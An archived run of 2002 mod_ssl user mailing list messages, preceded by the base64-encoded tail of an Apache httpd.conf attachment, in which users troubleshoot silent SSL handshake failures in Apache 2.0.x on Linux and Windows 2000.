aWd1cmF0aW9uIHJlcG9ydHMsIHdpdGggdGhlIFVSTCBvZg0KIyAgaHR0cDov
L3NlcnZlcm5hbWUvc2VydmVyLWluZm8gKHJlcXVpcmVzIHRoYXQgbW9kX2lu
Zm8uYyBiZSBsb2FkZWQpLg0KIyBDaGFuZ2UgdGhlICIueW91ci1kb21haW4u
Y29tIiB0byBtYXRjaCB5b3VyIGRvbWFpbiB0byBlbmFibGUuDQojDQojPExv
Y2F0aW9uIC9zZXJ2ZXItaW5mbz4NCiMgICAgU2V0SGFuZGxlciBzZXJ2ZXIt
aW5mbw0KIyAgICBPcmRlciBkZW55LGFsbG93DQojICAgIERlbnkgZnJvbSBh
bGwNCiMgICAgQWxsb3cgZnJvbSAueW91ci1kb21haW4uY29tDQojPC9Mb2Nh
dGlvbj4NCg0KIw0KIyBQcm94eSBTZXJ2ZXIgZGlyZWN0aXZlcy4gVW5jb21t
ZW50IHRoZSBmb2xsb3dpbmcgbGluZXMgdG8NCiMgZW5hYmxlIHRoZSBwcm94
eSBzZXJ2ZXI6DQojDQojPElmTW9kdWxlIG1vZF9wcm94eS5jPg0KI1Byb3h5
UmVxdWVzdHMgT24NCiMNCiM8UHJveHkgKj4NCiMgICAgT3JkZXIgZGVueSxh
bGxvdw0KIyAgICBEZW55IGZyb20gYWxsDQojICAgIEFsbG93IGZyb20gLnlv
dXItZG9tYWluLmNvbQ0KIzwvUHJveHk+DQoNCiMNCiMgRW5hYmxlL2Rpc2Fi
bGUgdGhlIGhhbmRsaW5nIG9mIEhUVFAvMS4xICJWaWE6IiBoZWFkZXJzLg0K
IyAoIkZ1bGwiIGFkZHMgdGhlIHNlcnZlciB2ZXJzaW9uOyAiQmxvY2siIHJl
bW92ZXMgYWxsIG91dGdvaW5nIFZpYTogaGVhZGVycykNCiMgU2V0IHRvIG9u
ZSBvZjogT2ZmIHwgT24gfCBGdWxsIHwgQmxvY2sNCiMNCiNQcm94eVZpYSBP
bg0KDQojDQojIFRvIGVuYWJsZSB0aGUgY2FjaGUgYXMgd2VsbCwgZWRpdCBh
bmQgdW5jb21tZW50IHRoZSBmb2xsb3dpbmcgbGluZXM6DQojIChubyBjYWNo
ZWluZyB3aXRob3V0IENhY2hlUm9vdCkNCiMNCiNDYWNoZVJvb3QgIi91c3Iv
bG9jYWwvcHJveHkiDQojQ2FjaGVTaXplIDUNCiNDYWNoZUdjSW50ZXJ2YWwg
NA0KI0NhY2hlTWF4RXhwaXJlIDI0DQojQ2FjaGVMYXN0TW9kaWZpZWRGYWN0
b3IgMC4xDQojQ2FjaGVEZWZhdWx0RXhwaXJlIDENCiNOb0NhY2hlIGEtZG9t
YWluLmNvbSBhbm90aGVyLWRvbWFpbi5lZHUgam9lcy5nYXJhZ2Utc2FsZS5j
b20NCg0KIzwvSWZNb2R1bGU+DQojIEVuZCBvZiBwcm94eSBkaXJlY3RpdmVz
Lg0KDQojDQojIEJyaW5nIGluIGFkZGl0aW9uYWwgbW9kdWxlLXNwZWNpZmlj
IGNvbmZpZ3VyYXRpb25zDQojDQo8SWZNb2R1bGUgbW9kX3NzbC5jPg0KICAg
IEluY2x1ZGUgY29uZi9zc2wuY29uZg0KPC9JZk1vZHVsZT4NCg0KDQojIyMg
U2VjdGlvbiAzOiBWaXJ0dWFsIEhvc3RzDQojDQojIFZpcnR1YWxIb3N0OiBJ
ZiB5b3Ugd2FudCB0byBtYWludGFpbiBtdWx0aXBsZSBkb21haW5zL2hvc3Ru
YW1lcyBvbiB5b3VyDQojIG1hY2hpbmUgeW91IGNhbiBzZXR1cCBWaXJ0dWFs
SG9zdCBjb250YWluZXJzIGZvciB0aGVtLiBNb3N0IGNvbmZpZ3VyYXRpb25z
DQojIHVzZSBvbmx5IG5hbWUtYmFzZWQgdmlydHVhbCBob3N0cyBzbyB0aGUg
c2VydmVyIGRvZXNuJ3QgbmVlZCB0byB3b3JyeSBhYm91dA0KIyBJUCBhZGRy
ZXNzZXMuIFRoaXMgaXMgaW5kaWNhdGVkIGJ5IHRoZSBhc3Rlcmlza3MgaW4g
dGhlIGRpcmVjdGl2ZXMgYmVsb3cuDQojDQojIFBsZWFzZSBzZWUgdGhlIGRv
Y3VtZW50YXRpb24gYXQgDQojIDxVUkw6aHR0cDovL2h0dHBkLmFwYWNoZS5v
cmcvZG9jcy0yLjAvdmhvc3RzLz4NCiMgZm9yIGZ1cnRoZXIgZGV0YWlscyBi
ZWZvcmUgeW91IHRyeSB0byBzZXR1cCB2aXJ0dWFsIGhvc3RzLg0KIw0KIyBZ
b3UgbWF5IHVzZSB0aGUgY29tbWFuZCBsaW5lIG9wdGlvbiAnLVMnIHRvIHZl
cmlmeSB5b3VyIHZpcnR1YWwgaG9zdA0KIyBjb25maWd1cmF0aW9uLg0KDQoj
DQojIFVzZSBuYW1lLWJhc2VkIHZpcnR1YWwgaG9zdGluZy4NCiMgVGhpcyBk
b2VzIG5vdCB3b3JrIHdpdGggU1NMIChwcmVzdW1hYmx5IGZvciB0aGUgdmly
dHVhbCBob3N0cywgbm90IHRoZSBwcmltYXJ5KQ0KIyANCiNOYW1lVmlydHVh
bEhvc3QgKg0KDQojDQojIFZpcnR1YWxIb3N0IGV4YW1wbGU6DQojIEFsbW9z
dCBhbnkgQXBhY2hlIGRpcmVjdGl2ZSBtYXkgZ28gaW50byBhIFZpcnR1YWxI
b3N0IGNvbnRhaW5lci4NCiMgVGhlIGZpcnN0IFZpcnR1YWxIb3N0IHNlY3Rp
b24gaXMgdXNlZCBmb3IgcmVxdWVzdHMgd2l0aG91dCBhIGtub3duDQojIHNl
cnZlciBuYW1lLg0KIw0KIzxWaXJ0dWFsSG9zdCAqPg0KIyAgICBTZXJ2ZXJB
ZG1pbiB3ZWJtYXN0ZXJAZHVtbXktaG9zdC5leGFtcGxlLmNvbQ0KIyAgICBE
b2N1bWVudFJvb3QgL3d3dy9kb2NzL2R1bW15LWhvc3QuZXhhbXBsZS5jb20N
CiMgICAgU2VydmVyTmFtZSBkdW1teS1ob3N0LmV4YW1wbGUuY29tDQojICAg
IEVycm9yTG9nIGxvZ3MvZHVtbXktaG9zdC5leGFtcGxlLmNvbS1lcnJvcl9s
b2cNCiMgICAgQ3VzdG9tTG9nIGxvZ3MvZHVtbXktaG9zdC5leGFtcGxlLmNv
bS1hY2Nlc3NfbG9nIGNvbW1vbg0KIzwvVmlydHVhbEhvc3Q+DQoNCjxWaXJ0
dWFsSG9zdCAyMDYuMjUzLjE5NS4yMTA+DQogU2VydmVyTmFtZSAzdGllcmdy
b3VwLmNvbQ0KIFNlcnZlckFsaWFzIHd3dy4zdGllcmdyb3VwLmNvbSAqLjN0
aWVyZ3JvdXAuY29tDQogRG9jdW1lbnRSb290IC91c3IvbG9jYWwvaHRkb2Nz
DQo8L1ZpcnR1YWxIb3N0Pg0KDQojPFZpcnR1YWxIb3N0ICo+DQojIFNlcnZl
ck5hbWUgd2VhdGhlcjJnby5pbmZvDQojIFNlcnZlckFsaWFzIHdlYXRoZXIy
Z28uaW5mbyAqLndlYXRoZXIyZ28uaW5mbyANCiMgRG9jdW1lbnRSb290IC91
c3IvbG9jYWwvaHRkb2NzL3cyZ290ZXN0DQojIEN1c3RvbUxvZyBsb2dzL3dl
YXRoZXIyZ28uaW5mby1hY2Nlc3NfbG9nIGNvbW1vbg0KIzwvVmlydHVhbEhv
c3Q+DQoNCiM8VmlydHVhbEhvc3QgKj4NCiMgU2VydmVyTmFtZSB3ZWF0aGVy
MmdvLmJpeg0KIyBTZXJ2ZXJBbGlhcyB3ZWF0aGVyMmdvLmJpeiAqLndlYXRo
ZXIyZ28uYml6DQojIERvY3VtZW50Um9vdCAvdXNyL2xvY2FsL2h0ZG9jcy93
MmdvdGVzdA0KIyBDdXN0b21Mb2cgbG9ncy93ZWF0aGVyMmdvLmJpei1hY2Nl
c3NfbG9nIGNvbW1vbg0KIzwvVmlydHVhbEhvc3Q+DQoNCjxWaXJ0dWFsSG9z
dCA2NC4xMzMuMjU0Ljc4Pg0KIFNlcnZlck5hbWUgd2VhdGhlcjJnby5uZXQN
CiBTZXJ2ZXJBbGlhcyB3ZWF0aGVyMmdvLm5ldCAqLndlYXRoZXIyZ28ubmV0
DQogRG9jdW1lbnRSb290IC91c3IvbG9jYWwvaHRkb2NzL3cyZ290ZXN0DQog
Q3VzdG9tTG9nIGxvZ3Mvd2VhdGhlcjJnby5uZXQtYWNjZXNzX2xvZyBjb21t
b24NCjwvVmlydHVhbEhvc3Q+DQo=
---1463811583-1654559762-1030994767=:1434--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  2 21:53:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA20918; Mon, 2 Sep 2002 21:52:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id VAA20911; Mon, 2 Sep 2002 21:51:42 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g82JoOkJ014570;
	Mon, 2 Sep 2002 15:50:24 -0400
Date: Mon, 2 Sep 2002 15:50:24 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: Paul English 
cc: modssl-users@modssl.org
Subject: Re: Apache 2.0.35 - ssl fails silently?
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 2 Sep 2002, Paul English wrote:

> 	I'm working with a new setup of 2.0.35 under Linux, and having

First of all, why 2.0.35 on a new setup?  2.0.36 was the first full
release (back in April).  2.0.40 is the current release.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Sep  2 22:56:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA22251; Mon, 2 Sep 2002 22:55:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.speakeasy.net id WAA22246; Mon, 2 Sep 2002 22:54:41 +0200 (MET DST)
Received: (qmail 23360 invoked from network); 2 Sep 2002 20:54:39 -0000
Received: from unknown (HELO palantir) ([216.231.61.23]) (envelope-sender )
          by mail11.speakeasy.net (qmail-ldap-1.03) with DES-CBC3-SHA encrypted SMTP
          for ; 2 Sep 2002 20:54:39 -0000
Date: Mon, 2 Sep 2002 13:54:39 -0700 (PDT)
From: Paul English 
X-X-Sender: tallpaul@palantir
To: "modssl-users@modssl.org" 
Subject: Re: Apache 2.0.35 - ssl fails silently?
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Paul English 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


> On Mon, 2 Sep 2002, Paul English wrote:
> 
> > 	I'm working with a new setup of 2.0.35 under Linux, and having
> 
> First of all, why 2.0.35 on a new setup?  2.0.36 was the first full
> release (back in April).  2.0.40 is the current release.


Oops, I guess I should have said "relatively new." It has been up and 
running without any SSL for a few months.

I'm downloading 2.0.40 now, although I think the problem is most likely 
configuration somehow.

Paul

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  3 08:41:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA03647; Tue, 3 Sep 2002 08:40:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id IAA03627; Tue, 3 Sep 2002 08:39:09 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id F40384CE68E; Tue,  3 Sep 2002 08:39:08 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2170228832; Tue,  3 Sep 2002 08:36:12 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from scanmail4.cableone.net id XAA23063; Mon, 2 Sep 2002 23:09:49 +0200 (MET DST)
Received: from scanmail4.cableone.net ([10.116.0.124]) by scanmail4.cableone.net  with Microsoft SMTPSVC(5.5.1877.687.68);
	 Mon, 2 Sep 2002 14:09:01 -0700
Received: from scanmail4.cableone.net [24.116.0.124] by scanmail4.cableone.net
  (SMTPD32-7.04) id A34F51400AC; Mon, 02 Sep 2002 14:08:31 -0700
Received: from achilles (223-33.porcpe.cableone.net [24.116.223.33]) by mail.cableone.net with SMTP (MailShield v2.04 - WIN32 Jul 17 2001 17:12:42); Mon, 02 Sep 2002 14:08:31 -0600
From: "VMaxx" 
To: "Vince Montuoro" , 
Subject: RE: Win32 1.3.26 and 2.8.10
Date: Mon, 2 Sep 2002 16:09:28 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: <25B12856E53F0047BE90FB2CFC0D1B5935B70B@rdsl_mlb_mx1.requestdsl.com.au>
X-SMTP-HELO: achilles
X-SMTP-MAIL-FROM: vmaxx@cableone.net
X-SMTP-PEER-INFO: 223-33.porcpe.cableone.net [24.116.223.33]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "VMaxx" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I downloaded the sources and compiled them.
SSL appears to be working to the point that its making
log files etc.  But its does its handshake and stops
after expecting a 5 byte read.

-----Original Message-----
From: Vince Montuoro [mailto:vmontuoro@request.com.au]
Sent: Sunday, September 01, 2002 11:44 PM
To: modssl-users@modssl.org
Cc: vmaxx@cableone.net
Subject: RE: Win32 1.3.26 and 2.8.10



Did you download the install file from modssl.org\contrib page?

if not go there and here is a great page to help you install Apache with
modssl
http://www.serverwatch.com/tutorials/article.php/1437211
and mysql installation if your interested
http://www.serverwatch.com/tutorials/article.php/1441631


Good Luck

Vince

p.s IF YOU GET  AN APPLE IMAC ACCESSING THE SITE EMAIL ME YOUR WORKING
CONFIG PLEASE.



-----Original Message-----
From: VMaxx [mailto:vmaxx@cableone.net]
Sent: Monday, 2 September 2002 12:44 AM
To: modssl-users@modssl.org
Subject: Win32 1.3.26 and 2.8.10


I've done all kinds of configuration modifications etc, and it handshakes
but drops immediately after.  It appears that others have been having the
same results.  So I was wondering, Has anyone successfully gotten it to work
on Win32?

Thanks
Shane
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  3 09:23:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA05035; Tue, 3 Sep 2002 09:22:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id JAA05029; Tue, 3 Sep 2002 09:21:43 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g837LSa17124
	for ; Tue, 3 Sep 2002 09:21:28 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Tue Sep 03 09:21:36 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Tue, 3 Sep 2002 09:21:27 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Tue, 3 Sep 2002 09:21:27 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Tue, 3 Sep 2002 09:21:25 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: Apache 2.0.35 - ssl fails silently?
Date: Tue, 3 Sep 2002 09:21:25 +0200
Message-ID: 
Thread-Topic: Apache 2.0.35 - ssl fails silently?
Thread-Index: AcJSw1N0V5G5MnVrRvOi8pRNdCElDQAVyQhg
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 03 Sep 2002 07:21:25.0429 (UTC) FILETIME=[8324FE50:01C2531A]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id JAA05031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Have you tried looking in ssl_engine.log?


-----Original Message-----
From: Paul English [mailto:tallpaul@speakeasy.org]
Sent: 02 September 2002 22:55
To: modssl-users@modssl.org
Subject: Re: Apache 2.0.35 - ssl fails silently?



> On Mon, 2 Sep 2002, Paul English wrote:
> 
> > 	I'm working with a new setup of 2.0.35 under Linux, and having
> 
> First of all, why 2.0.35 on a new setup?  2.0.36 was the first full
> release (back in April).  2.0.40 is the current release.


Oops, I guess I should have said "relatively new." It has been up and 
running without any SSL for a few months.

I'm downloading 2.0.40 now, although I think the problem is most
likely 
configuration somehow.

Paul

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  3 14:44:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA11400; Tue, 3 Sep 2002 14:43:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id OAA11390; Tue, 3 Sep 2002 14:42:14 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B04C54CE74A; Tue,  3 Sep 2002 14:42:13 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id AAB3E28835; Tue,  3 Sep 2002 14:41:11 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from procert.cert.dfn.de id OAA10588; Tue, 3 Sep 2002 14:02:29 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by procert.cert.dfn.de (Sendmail) with ESMTP id 6A39769E2A
	for ; Tue,  3 Sep 2002 13:59:36 +0200 (MEST)
Received: from procert.cert.dfn.de ([193.174.13.1]) by localhost (procert [127.0.0.1]) (content checker) with ESMTP id 16887-03 for ; Tue,  3 Sep 2002 13:59:36 -0000 (MEST)
Received: from nessus.pca.dfn.de (nessus.pca.dfn.de [193.174.13.24])
	by procert.cert.dfn.de (Sendmail) with ESMTP id 3CE6569E25
	for ; Tue,  3 Sep 2002 13:59:36 +0200 (MEST)
Received: by nessus.pca.dfn.de (Sendmail, from userid 10217)
	id C8C1E1E82B; Tue,  3 Sep 2002 13:57:05 +0200 (MEST)
Date: Tue, 3 Sep 2002 13:57:05 +0200
From: Olaf Gellert 
To: modssl-users@modssl.org
Subject: Re: Apache 2.0.35 - ssl fails silently?
Message-ID: <20020903135705.A5017@nessus.pca.dfn.de>
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from tallpaul@speakeasy.org on Mon, Sep 02, 2002 at 12:26:07PM -0700
X-Virus-Scanned: by DFN-CERT content checker
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Olaf Gellert 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

> None of the above seems to work. Thrown into the mix I have several 
> interfaces on the machine, and ipchains (for which I've enabled access 
> from everywhere to port 443).
And hopefully you enabled response packets going from port
443 to the world? I don't know the semantic of nmap, is a
closed port some port where in response to a SYN-packet,
a RST is sent? Or is it a filtered one (= no response).
Just to make sure it's not your firewall. Maybe you can
open all incoming and outgoing packets from localhost
(just for testing) and try a local telnet to that port?

Olaf
-- 
Olaf Gellert                           mailto:gellert@pca.dfn.de
----------------------------------------------------------------
DFN-PCA:                    Eine Arbeitsgruppe der DFN-CERT GmbH
Oberstr. 14b                              http://www.pca.dfn.de/
D-20144 Hamburg, Germany           +49.40.808077-555 / Fax: -556
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  3 16:52:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA14976; Tue, 3 Sep 2002 16:51:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mhro1.mayo.edu id QAA14963; Tue, 3 Sep 2002 16:50:25 +0200 (MET DST)
Received: from fermat.mayo.edu by mhro1.mayo.edu with ESMTP for modssl-users@modssl.org; Tue, 3 Sep 2002 09:50:23 -0500
Received: from doorstop (doorstop.mayo.edu [129.176.212.87])
	by fermat.mayo.edu (8.8.8+Sun/8.8.8) with SMTP id JAA24902
	for ; Tue, 3 Sep 2002 09:50:53 -0500 (CDT)
From: "Paul Bleimeyer" 
To: 
Subject: RE: Apache 2.0.40 - Loaded mod_ssl successfully on w2k?
Date: Tue, 3 Sep 2002 09:47:21 -0500
Message-Id: <01d001c25358$cfe6c4b0$57d4b081@doorstop>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="US-ASCII"
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: 
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Paul Bleimeyer" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Has anyone successfully implemented mod_sll under 2.40 apache for w2k?
I am getting a 501 1051 internal server error back. The ssl engine is
loading
but no response when I connect to the port.

[info] Init: Initializing OpenSSL library
[Fri Aug 30 15:51:28 2002] [info] Init: Seeding PRNG with 0 bytes of entropy
[Fri Aug 30 15:51:28 2002] [info] Init: Generating temporary RSA private
keys (512/1024 bits)
[Fri Aug 30 15:51:28 2002] [info] Init: Generating temporary DH parameters
(512/1024 bits)
[Fri Aug 30 15:51:28 2002] [info] Init: Initializing (virtual) servers for
SSL
[Fri Aug 30 15:51:28 2002] [info] Server: Apache/2.0.40, Interface:
mod_ssl/2.0.40, Library: OpenSSL/0.9.6g
[Fri Aug 30 15:51:29 2002] [notice] Parent: Created child process 3484
[Fri Aug 30 15:51:29 2002] [debug] .\server\mpm\winnt\mpm_winnt.c(483):
Parent: Sent the scoreboard to the child
[Fri Aug 30 15:51:29 2002] [info] Init: Initializing OpenSSL library
[Fri Aug 30 15:51:29 2002] [info] Init: Seeding PRNG with 0 bytes of entropy
[Fri Aug 30 15:51:29 2002] [info] Init: Generating temporary RSA private
keys (512/1024 bits)
[Fri Aug 30 15:51:29 2002] [notice] Child 564: Released the start mutex
[Fri Aug 30 15:51:29 2002] [info] Init: Generating temporary DH parameters
(512/1024 bits)
[Fri Aug 30 15:51:29 2002] [warn] Init: Session Cache is not configured
[hint: SSLSessionCache]

192.168.1.2 - - [30/Aug/2002:12:30:48 -0500] "?L" 501 1051
192.168.1.2 - - [30/Aug/2002:13:23:04 -0500] "?L" 501 1051
192.168.1.2 - - [30/Aug/2002:14:35:42 -0500] "?L" 501 1051
192.168.1.2 - - [30/Aug/2002:14:35:45 -0500] "?L" 501 1051
192.168.1.2 - - [30/Aug/2002:14:35:53 -0500] "?L" 501 1051

>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  3 17:28:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA15929; Tue, 3 Sep 2002 17:27:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mxbackup.aarboard.ch id RAA15925; Tue, 3 Sep 2002 17:26:22 +0200 (MET DST)
Received: from [127.0.0.1] by mxbackup.relay01.aarboard.ch (NTMail 5.06.0016/NT8408.02.a3c8321a) with ESMTP id qeztbaaa for modssl-users@modssl.org; Tue, 3 Sep 2002 17:26:11 +0200
Received: from mail3.aarboard.ch ([192.168.200.11])
 by relay01.aarboard.ch (NAVGW 2.5.2.12) with SMTP id M2002090317261030771
 for ; Tue, 03 Sep 2002 17:26:10 +0200
Received: from Aarboard-MTA by mail3.aarboard.ch
	with Novell_GroupWise; Tue, 03 Sep 2002 17:25:21 +0200
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2
Date: Tue, 03 Sep 2002 17:25:05 +0200
From: "Andre Schild" 
To: 
Subject: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on w2k?
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA15926
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andre Schild" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

>Has anyone successfully implemented mod_sll under 2.40 apache for w2k?
>I am getting a 501 1051 internal server error back. The ssl engine is
>loading
>but no response when I connect to the port.

2.0.40 works fine for me under W2K with OpenSSL 0.9.6e
Did compile it from the scratch...

Binaries are here:
http://www.switzerland.net/Pneatec/

André
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Sep  3 17:52:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA16331; Tue, 3 Sep 2002 17:51:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp1.ndchealth.com id RAA16327; Tue, 3 Sep 2002 17:51:00 +0200 (MET DST)
Received: from claven.cistech.com (claven.cistech.com [198.200.166.25])
	by smtp1.ndchealth.com (8.11.6/8.11.6) with ESMTP id g83Foii14009
	for ; Tue, 3 Sep 2002 11:50:44 -0400
Received: by claven.cistech.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 3 Sep 2002 10:51:38 -0500
Message-ID: <4242F92CA015D5119B9600600834014202A7F4D7@claven.cistech.com>
From: "Lakey, Jeremy # IHTUL" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on w2k?
Date: Tue, 3 Sep 2002 10:51:38 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA16328
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lakey, Jeremy # IHTUL" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Ditto, compiled from scratch, apache 2.0.40, seperately compiled mod_ssl.so
and moved it into the apache2 installed directory, worked fine..



-----Original Message-----
From: Andre Schild [mailto:A.Schild@aarboard.ch] 
Sent: Tuesday, September 03, 2002 10:25 AM
To: modssl-users@modssl.org
Subject: Antw: RE: Apache 2.0.40 - Loaded mod_ssl successfully on w2k?


>Has anyone successfully implemented mod_sll under 2.40 apache for w2k? 
>I am getting a 501 1051 internal server error back. The ssl engine is 
>loading but no response when I connect to the port.

2.0.40 works fine for me under W2K with OpenSSL 0.9.6e
Did compile it from the scratch...

Binaries are here:
http://www.switzerland.net/Pneatec/

André ______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
